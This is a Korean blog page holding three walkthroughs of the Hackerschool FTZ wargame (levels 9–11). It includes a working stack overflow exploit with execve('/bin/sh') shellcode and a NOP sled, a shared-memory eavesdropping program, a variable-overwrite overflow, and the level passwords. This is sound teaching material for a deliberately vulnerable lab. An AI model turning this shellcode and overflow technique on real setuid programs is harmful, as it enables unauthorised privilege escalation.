M4ndU의 만두만두한 블로그

PREV 1 ···140 141 142 143 144 145 146 ···153 NEXT

해커스쿨 FTZ [LEVEL11] 풀이

2018. 2. 8. 22:31

해커스쿨 FTZ [LEVEL11] 풀이

M4ndU

해커스쿨 FTZ [LEVEL11] 풀이입니다.

ID | level11

PW | what!@#$?

으로 로그인합니다.

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat hint

를 이용해 힌트를 확인합시다.

level11@192.168.31.128's password:

[level11@ftz level11]$ ls -l

total 28

-rwsr-x--- 1 level12 level11 13733 Mar 8 2003 attackme

-rw-r----- 1 root level11 168 Mar 8 2003 hint

drwxr-xr-x 2 root level11 4096 Feb 24 2002 public_html

drwxrwxr-x 2 root level11 4096 Jan 14 2009 tmp

[level11@ftz level11]$ cat hint

#include <stdio.h>

#include <stdlib.h>

int main( int argc, char *argv[] )

{

char str[256];

setreuid( 3092, 3092 );

strcpy( str, argv[1] );

printf( str );

}

이번에는 attackme라는 파일이 추가되었네요.

일단 hint를 확인해 봅시다.

attackme의 소스코드인 것 같습니다.

str의 크기는 256바이트인데 입력값의 크기를 제한하지 않네요.

이것을 보고 버퍼오버플로우 문제인 것을 알 수 있습니다.

그럼 이제 gdb를 통해 str과 RET의 거리를 알아봅시다.

[level11@ftz level11]$ gdb -q attackme

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x08048470 <main+0>: push ebp

0x08048471 <main+1>: mov ebp,esp

0x08048473 <main+3>: sub esp,0x108

0x08048479 <main+9>: sub esp,0x8

0x0804847c <main+12>: push 0xc14

0x08048481 <main+17>: push 0xc14

0x08048486 <main+22>: call 0x804834c <setreuid>

0x0804848b <main+27>: add esp,0x10

0x0804848e <main+30>: sub esp,0x8

0x08048491 <main+33>: mov eax,DWORD PTR [ebp+12]

0x08048494 <main+36>: add eax,0x4

0x08048497 <main+39>: push DWORD PTR [eax]

0x08048499 <main+41>: lea eax,[ebp-264]

0x0804849f <main+47>: push eax

0x080484a0 <main+48>: call 0x804835c <strcpy>

0x080484a5 <main+53>: add esp,0x10

0x080484a8 <main+56>: sub esp,0xc

0x080484ab <main+59>: lea eax,[ebp-264]

0x080484b1 <main+65>: push eax

0x080484b2 <main+66>: call 0x804833c <printf>

0x080484b7 <main+71>: add esp,0x10

0x080484ba <main+74>: leave

---Type <return> to continue, or q <return> to quit---

0x080484bb <main+75>: ret

0x080484bc <main+76>: nop

0x080484bd <main+77>: nop

0x080484be <main+78>: nop

0x080484bf <main+79>: nop

End of assembler dump.

*main+41 과 *main+48 부분을 보면 ebp-264부터 입력값을 받는 것을 알 수 있네요.

str에 256바이트가 할당되었으므로 8바이트가 dummy (쓰레기값)으로 존재하는 것을 알 수 있습니다.

현재 스택구조를 다음과 같이 나타낼 수 있습니다:

낮은 주소

str[256]

dummy[8]

SFP[4]

RET[4]

높은 주소

우리는 25바이트 쉘코드를 사용하겠습니다.

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

그리고 쉘코드 앞에 NOP을 의미하는 \x90으로 채우겠습니다.

268(str[256]+dummy[8]+SFP[4]) - 25(shellcode) = 243

"\x90"*243

이제 리턴주소를 구하기 위해 ebp-264의 주소를 알아보겠습니다.

ebp-264에 argv[1]을 덮어쓰는 작업을 하고 난 후인 *main+53 에 break point를 걸고

(gdb) b *main+53

Breakpoint 1 at 0x80484a5

argv[1]의 값으로 위에서 만든 코드 + 리턴주소를 입력하겠습니다.

`python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

(gdb) r `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

Starting program: /home/level11/attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

Couldn't get registers: Operation not permitted.

오류가 나네요...

파일을 tmp폴더로 복사해서 진행해야겠네요.

(gdb) q

The program is running. Exit anyway? (y or n) y

[1]+ Stopped gdb -q attackme

[level11@ftz level11]$ cp attackme tmp/

[level11@ftz level11]$ cd tmp

[level11@ftz tmp]$ gdb -q attackme

(gdb) b *main+53

Breakpoint 1 at 0x80484a5

(gdb) r `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

Starting program: /home/level11/tmp/attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"AAAA"'`

Breakpoint 1, 0x080484a5 in main ()

스택을 확인해 봅시다.

(gdb) x/100 $esp

0xbffff430: 0xbffff440 0xbffffb23 0xbffff460 0x00000001

0xbffff440: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff450: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff460: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff470: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff480: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff490: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4a0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4b0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4c0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4d0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4e0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff4f0: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff500: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff510: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff520: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff530: 0x31909090 0x2f6850c0 0x6868732f 0x6e69622f

0xbffff440 부터 시작이 되네요. 리턴 주소로 0xbffff440으로 잡고 tmp/attackme 를 실행해보겠습니다.

./attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\x40\xf4\xff\xbf"'`

[level11@ftz tmp]$ ./attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\x40\xf4\xff\xbf"'`

Segmentation fault

음.. 아무래도 노가다가 필요해 보이네요. 쉘이 뜰때까지 리턴주소를 바꿔주며 반복시도 해보겠습니다.

Segmentation fault

[level11@ftz tmp]$ ./attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\x40\xfb\xff\xbf"'`

sh-2.05b$ exit

exit

0xbffffb40에서 성공했습니다!

이제 본래 문제 파일에서 시도하겠습니다.

[level11@ftz tmp]$ cd ..

[level11@ftz level11]$ ./attackme `python -c 'print "\x90"*243+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"\x40\xfb\xff\xbf"'`

sh-2.05b$ my-pass

TERM environment variable not set.

Level12 Password is "it is like this".

가즈으으ㅡ으으으아ㅏ아아ㅏ

저작자표시 비영리 동일조건

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL13] 풀이 (2)	2018.02.09
해커스쿨 FTZ [LEVEL12] 풀이 (4)	2018.02.09
해커스쿨 FTZ [LEVEL10] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL9] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL8] 풀이 (0)	2018.02.07

해커스쿨 FTZ [LEVEL10] 풀이

2018. 2. 7. 21:15

해커스쿨 FTZ [LEVEL10] 풀이

M4ndU

해커스쿨 FTZ [LEVEL10] 풀이입니다.

ID | level10

PW | interesting to hack!

으로 로그인합니다.

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat hint

를 이용해 힌트를 확인합시다.

level10@192.168.31.128's password:

[level10@ftz level10]$ ls -l

total 16

-rw-r----- 1 root level10 253 Jan 14 2010 hint

drwxr-x--- 2 root root 4096 Mar 29 2003 program

drwxr-xr-x 2 root level10 4096 Feb 24 2002 public_html

drwxrwxr-x 2 root level10 4096 Jan 16 2009 tmp

[level10@ftz level10]$ cat hint

두명의 사용자가 대화방을 이용하여 비밀스런 대화를 나누고 있다.

그 대화방은 공유 메모리를 이용하여 만들어졌으며,

key_t의 값은 7530이다. 이를 이용해 두 사람의 대화를 도청하여

level11의 권한을 얻어라.

- 레벨을 완료하셨다면 소스는 지우고 나가주세요.

공유 메모리에 관한 문제입니다.

공유 메모리에 대해 공부를 하고 옵시다!!! (구글링)

....

하고 오셨나여?

일단 공유 메모리와 관련된 명령어인 ipcs를 사용해봅시다.

[level10@ftz level10]$ ipcs

------ Shared Memory Segments --------

key shmid owner perms bytes nattch status

0x00001d6a 0 root 666 1028 0

------ Semaphore Arrays --------

key semid owner perms nsems

------ Message Queues --------

key msqid owner perms used-bytes messages

key가 0x00001d6a = 7530 인 것이 있네요.

이제 tmp 폴더로 이동해서 코드를 작성합시다.

[level10@ftz level10]$ cd tmp

[level10@ftz tmp]$ vi level10.c

#include<stdio.h>

#include<sys/ipc.h>

#include<sys/shm.h>

int main(){

int a;

char* b;

a = shmget(7530, 1028, IPC_CREAT|0666);

b = shmat(a, NULL, 0);

printf("%s", b);

}

컴파일후, 실행해 줍시다.

[level10@ftz tmp]$ gcc -o level10 level10.c

[level10@ftz tmp]$ ./level10

멍멍: level11의 패스워드는?

구타: what!@#$?

다음 레벨로~ 가즈아~

저작자표시 비영리 동일조건

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL12] 풀이 (4)	2018.02.09
해커스쿨 FTZ [LEVEL11] 풀이 (3)	2018.02.08
해커스쿨 FTZ [LEVEL9] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL8] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL7] 풀이 (0)	2018.02.07

해커스쿨 FTZ [LEVEL9] 풀이

2018. 2. 7. 20:55

해커스쿨 FTZ [LEVEL9] 풀이

M4ndU

해커스쿨 FTZ [LEVEL9] 풀이입니다.

ID | level9

PW | apple

으로 로그인합니다.

$ ls -l

를 이용해 어떤 파일과 어떤 폴더가 있는지 확인하고,

$ cat hint

를 이용해 힌트를 확인합시다.

level9@192.168.31.128's password:

[level9@ftz level9]$ ls -l

total 12

-rw-r--r-- 1 root root 391 Nov 13 2002 hint

drwxr-xr-x 2 root level9 4096 Feb 24 2002 public_html

drwxrwxr-x 2 root level9 4096 Jan 16 2009 tmp

[level9@ftz level9]$ cat hint

다음은 /usr/bin/bof의 소스이다.

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

main(){

char buf2[10];

char buf[10];

printf("It can be overflow : ");

fgets(buf,40,stdin);

if ( strncmp(buf2, "go", 2) == 0 )

{

printf("Good Skill!\n");

setreuid( 3010, 3010 );

system("/bin/bash");

}

이를 이용하여 level10의 권한을 얻어라.

이 문제는 버퍼오버플로우 문제이네요.

buf의 크기는 10인데, 40만큼 입력을 받으면서 버퍼오버플로우 취약점이 생깁니다.

buf2가 먼저 선언되고 그다음 buf가 선언되었으므로 입력값이 buf를 넘어서면 buf2를 침범하게 되겠네요.

이렇게 해서 buf2의 값을 "go"로 바꿔주면 level10의 권한의 쉘을 띄워주는 것 같습니다.

그럼 정확한 buf와 buf2의 위치를 알아 보겠습니다.

힌트에 나온 소스를 복사하여 새롭게 컴파일을 하겠습니다.

[level9@ftz level9]$ cd tmp

[level9@ftz tmp]$ cat > bof.c

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

main(){

char buf2[10];

char buf[10];

printf("It can be overflow : ");

fgets(buf,40,stdin);

if ( strncmp(buf2, "go", 2) == 0 )

{

printf("Good Skill!\n");

setreuid( 3010, 3010 );

system("/bin/bash");

}

[level9@ftz tmp]$ gcc -o bof bof.c

이제 gdb를 사용해서 분석을 해봅시다.

[level9@ftz tmp]$ gdb -q bof

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x08048420 <main+0>: push ebp

0x08048421 <main+1>: mov ebp,esp

0x08048423 <main+3>: sub esp,0x28

0x08048426 <main+6>: and esp,0xfffffff0

0x08048429 <main+9>: mov eax,0x0

0x0804842e <main+14>: sub esp,eax

0x08048430 <main+16>: sub esp,0xc

0x08048433 <main+19>: push 0x8048554

0x08048438 <main+24>: call 0x8048350 <printf>

0x0804843d <main+29>: add esp,0x10

0x08048440 <main+32>: sub esp,0x4

0x08048443 <main+35>: push ds:0x8049698

0x08048449 <main+41>: push 0x28

0x0804844b <main+43>: lea eax,[ebp-40]

0x0804844e <main+46>: push eax

0x0804844f <main+47>: call 0x8048320 <fgets>

0x08048454 <main+52>: add esp,0x10

0x08048457 <main+55>: sub esp,0x4

0x0804845a <main+58>: push 0x2

0x0804845c <main+60>: push 0x804856a

0x08048461 <main+65>: lea eax,[ebp-24]

0x08048464 <main+68>: push eax

0x08048465 <main+69>: call 0x8048330 <strncmp>

0x0804846a <main+74>: add esp,0x10

0x0804846d <main+77>: test eax,eax

0x0804846f <main+79>: jne 0x80484a6 <main+134>

0x08048471 <main+81>: sub esp,0xc

0x08048474 <main+84>: push 0x804856d

0x08048479 <main+89>: call 0x8048350 <printf>

0x0804847e <main+94>: add esp,0x10

0x08048481 <main+97>: sub esp,0x8

---Type <return> to continue, or q <return> to quit---

0x08048484 <main+100>: push 0xbc2

0x08048489 <main+105>: push 0xbc2

0x0804848e <main+110>: call 0x8048360 <setreuid>

0x08048493 <main+115>: add esp,0x10

0x08048496 <main+118>: sub esp,0xc

0x08048499 <main+121>: push 0x804857a

0x0804849e <main+126>: call 0x8048310 <system>

0x080484a3 <main+131>: add esp,0x10

0x080484a6 <main+134>: leave

0x080484a7 <main+135>: ret

End of assembler dump.

buf 의 시작점은 [ebp-40]

buf2 의 시작점은 [ebp-24] 이네요.

이 둘의 차이가 16이므로 16바이트를 채우면 그 다음 바이트는 buf2의 값이 됩니다.

확인해 보겠습니다.

[level9@ftz tmp]$ ./bof

It can be overflow : aaaaaaaaaaaaaaaago

Good Skill!

Good Skill!이 출력되는 것으로 보아 buf2의 값이 go 가 되어 조건문이 성립되었다는 것을 알 수 있습니다.

이제 실제 문제를 풀어봅시다.

[level9@ftz tmp]$ cd /usr/bin

[level9@ftz bin]$ ./bof

It can be overflow : aaaaaaaaaaaaaaaago

Good Skill!

[level10@ftz bin]$

성공입니다!

[level10@ftz bin]$ my-pass

Level10 Password is "interesting to hack!".

GAZUAAAAAAAAAAAAAAAAAAAAAAAAA!!

저작자표시 비영리 동일조건

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL11] 풀이 (3)	2018.02.08
해커스쿨 FTZ [LEVEL10] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL8] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL7] 풀이 (0)	2018.02.07
해커스쿨 FTZ [LEVEL6] 풀이 (0)	2018.02.07

PREV 1 ···140 141 142 143 144 145 146 ···153 NEXT

M4ndU의 만두만두한 블로그

해커스쿨 FTZ [LEVEL11] 풀이

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL10] 풀이

'System Hacking > FTZ' 카테고리의 다른 글

해커스쿨 FTZ [LEVEL9] 풀이

'System Hacking > FTZ' 카테고리의 다른 글

+ Recent posts

티스토리툴바